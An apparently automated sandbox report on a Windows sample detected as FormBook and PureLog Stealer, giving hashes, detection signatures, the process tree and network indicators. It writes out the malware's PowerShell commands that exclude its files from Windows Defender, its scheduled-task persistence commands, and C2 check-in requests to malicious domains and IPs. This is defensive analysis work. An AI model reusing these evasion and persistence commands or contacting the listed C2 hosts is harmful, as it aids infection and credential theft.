Windows Analysis Report
UnmxRI.exe

Overview

General Information

Sample name:UnmxRI.exe
Analysis ID:1501599
MD5:e34c33903020a81f3a09a69c29ade426
SHA1:864aaa5821e9f3e99da71eff1c8b76bcd1cdea80
SHA256:c9062d78ee63874928e2d332a8ed0570e99bc06e544e33f002b26f70e0c19510
Tags:exe, formbook

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • UnmxRI.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\UnmxRI.exe" MD5: E34C33903020A81F3A09A69C29ADE426)
    • powershell.exe (PID: 5416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6556 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1408 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • UnmxRI.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\UnmxRI.exe" MD5: E34C33903020A81F3A09A69C29ADE426)
      • NUJqNHNKrrpXWLOEvky.exe (PID: 6608 cmdline: "C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • print.exe (PID: 3092 cmdline: "C:\Windows\SysWOW64\print.exe" MD5: B6B0D7357995EFA5F07CEBD4593C7A9C)
          • NUJqNHNKrrpXWLOEvky.exe (PID: 5264 cmdline: "C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 428 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • tehuvFgZlLZK.exe (PID: 6844 cmdline: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe MD5: E34C33903020A81F3A09A69C29ADE426)
    • schtasks.exe (PID: 4112 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tehuvFgZlLZK.exe (PID: 5016 cmdline: "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe" MD5: E34C33903020A81F3A09A69C29ADE426)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2100365796.0000000006850000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x27a30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.2086201250.00000000026E9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.2086201250.0000000002727000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author | Strings
10.2.tehuvFgZlLZK.exe.26c1140.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.UnmxRI.exe.27089b0.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
10.2.tehuvFgZlLZK.exe.28f8b00.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.UnmxRI.exe.24d10ec.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.UnmxRI.exe.36139f0.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

                    System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", ProcessId: 5416, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe, ParentImage: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe, ParentProcessId: 6844, ParentProcessName: tehuvFgZlLZK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp", ProcessId: 4112, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", ProcessId: 1408, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", ProcessId: 5416, ProcessName: powershell.exe

                    Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", ProcessId: 1408, ProcessName: schtasks.exe
Timestamp: 2024-08-30T07:19:13.142223+0200, SID: 2050745, Severity: 1, Source Port: 49726, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:18:35.434943+0200, SID: 2050745, Severity: 1, Source Port: 49717, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:21:13.661153+0200, SID: 2050745, Severity: 1, Source Port: 49750, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:20:51.661641+0200, SID: 2050745, Severity: 1, Source Port: 49746, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:21:52.389719+0200, SID: 2050745, Severity: 1, Source Port: 49758, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:19:49.860329+0200, SID: 2050745, Severity: 1, Source Port: 49734, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:20:24.305204+0200, SID: 2050745, Severity: 1, Source Port: 49738, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:21:35.712132+0200, SID: 2050745, Severity: 1, Source Port: 49754, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:20:37.687030+0200, SID: 2050745, Severity: 1, Source Port: 49742, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:19:35.231734+0200, SID: 2050745, Severity: 1, Source Port: 49730, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:18:59.865503+0200, SID: 2050745, Severity: 1, Source Port: 49722, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-08-30T07:22:07.118884+0200, SID: 2050745, Severity: 1, Source Port: 49762, Destination Port: 80, Protocol: TCP, Classtype: Malware Command and Control Activity Detected

                    AV Detection

Source: http://www.theranchobizarro.com/fgkz/, Avira URL Cloud: Label: malware
Source: http://www.sciencebot.sbs/fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj, Avira URL Cloud: Label: malware
Source: http://www.nexgen-gaming.com/fgkz/, Avira URL Cloud: Label: malware
Source: http://www.sciencebot.sbs/fgkz/, Avira URL Cloud: Label: malware
Source: http://www.theranchobizarro.com/fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj, Avira URL Cloud: Label: malware
Source: http://www.nexgen-gaming.com/fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ==, Avira URL Cloud: Label: malware
Source: gpcamservices.com, Virustotal: Detection: 8%
Source: www.sportspaj.com, Virustotal: Detection: 6%
Source: nexgen-gaming.com, Virustotal: Detection: 10%
Source: noobblaster.com, Virustotal: Detection: 8%
Source: www.nathanladd.software, Virustotal: Detection: 6%
Source: www.gpcamservices.com, Virustotal: Detection: 10%
Source: www.pheonix-travels.com, Virustotal: Detection: 6%
Source: www.noobblaster.com, Virustotal: Detection: 6%
Source: http://www.theranchobizarro.com/fgkz/, Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe, ReversingLabs: Detection: 65%
Source: UnmxRI.exe, ReversingLabs: Detection: 65%
Source: UnmxRI.exe, Virustotal: Detection: 68%
Source: Yara match, File source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe, Joe Sandbox ML: detected
Source: UnmxRI.exe, Joe Sandbox ML: detected
Source: UnmxRI.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: UnmxRI.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: firefox.pdbP source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: UnmxRI.pdbSHA2561 source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
                    Source: Binary string: UnmxRI.pdb source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
                    Source: Binary string: print.pdbGCTL source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152182094.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4494232519.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: wntdll.pdbUGP source: UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: UnmxRI.exe, UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: print.pdb source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\print.exe, Code function: 16_2_004BC0B0 FindFirstFileW,FindNextFileW,FindClose, 16_2_004BC0B0
Source: C:\Windows\SysWOW64\print.exe, Code function: 4x nop then pop edi, 16_2_004B1870
Source: C:\Windows\SysWOW64\print.exe, Code function: 4x nop then xor eax, eax, 16_2_004A98C0
Source: C:\Windows\SysWOW64\print.exe, Code function: 4x nop then pop edi, 16_2_004AE137
Source: C:\Windows\SysWOW64\print.exe, Code function: 4x nop then mov ebx, 00000004h, 16_2_00BB0531

                    Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49726 -> 52.9.242.57:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49730 -> 91.195.240.19:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49746 -> 122.10.12.59:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49750 -> 91.195.240.19:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49717 -> 91.195.240.19:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49734 -> 119.18.54.85:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49742 -> 104.21.92.135:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49758 -> 212.32.237.90:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49722 -> 167.172.228.26:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49762 -> 167.172.228.26:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49738 -> 66.29.154.248:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49754 -> 216.40.34.41:80
                    Source: DNS query: www.heilao9.xyz
Source: Joe Sandbox View, IP Address: 52.9.242.57
Source: Joe Sandbox View, IP Address: 212.32.237.90
Source: Joe Sandbox View, ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: LEASEWEB-NL-AMS-01NetherlandsNL
Source: Joe Sandbox View, ASN Name: DIGITALOCEAN-ASNUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /fgkz/?4f2t8=qUFBQvWBSx+bgMqyDmLQ5iNb4eTiibWqPMlygN/fc4+dM2Q0fApyvpqDNInFWFQ7PUEWbfd7zdq6gjmLUkGdSLdX5yRbFI8ZXQ==&nFeHa=dbNpTj HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.pheonix-travels.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ== HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.nexgen-gaming.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.theranchobizarro.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.sciencebot.sbs | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=y4FhMh12ATfkFg6tImNw7XoZ6hnl8AB4notnPujEUk+EgZuT0tb2uZJUNE/t4waZuxpptBF/Humi+b09KdNA9iSMBM18JBKWRg== HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.gpcamservices.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?4f2t8=+meHlBDXvFG0tp5IHuNp5aNfi3jbma4/KPg1jYwxKUxzXvorilFM4RqNjl5oI+tAWQpMLL6Kz03IcJJlzmvukn6IT7E7w1sf4w==&nFeHa=dbNpTj HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.slimdut.top | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=jkJyt4aMtNKoYD5sbuFVc9QyaTZ4K2J/yr+l21//H5N/WdfnKajTYLfT/HfxXPoaC4ByuXnDUz3XZuyNEmOuuyoe00P8CgSW4g== HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.otomain.info | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?4f2t8=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlSNGPfsMX8qY9T/A==&nFeHa=dbNpTj HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.uty803.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?4f2t8=41Curen82hkwcHpyAWCbG1C0h00zKpR4XE7lig5tQUDuQ/w4IAvXl9Gm09xCLibXJ4gYU1q3vSZc7UEZudfqXPaUnSpi+WZhrQ==&nFeHa=dbNpTj HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.nathanladd.software | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /fgkz/?4f2t8=zruAGbX+zzZzwXhsAlQZAULZe4pnPcBNBYGP0N8wJF4ze778247Xmh3iJl2/TqyIQwvJNtjZAjEGWTxWxFAMT6BKV60sGMz7yg==&nFeHa=dbNpTj HTTP/1.1 | Accept: */* | Accept-Language: en-us | Host: www.hugelmann.org | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
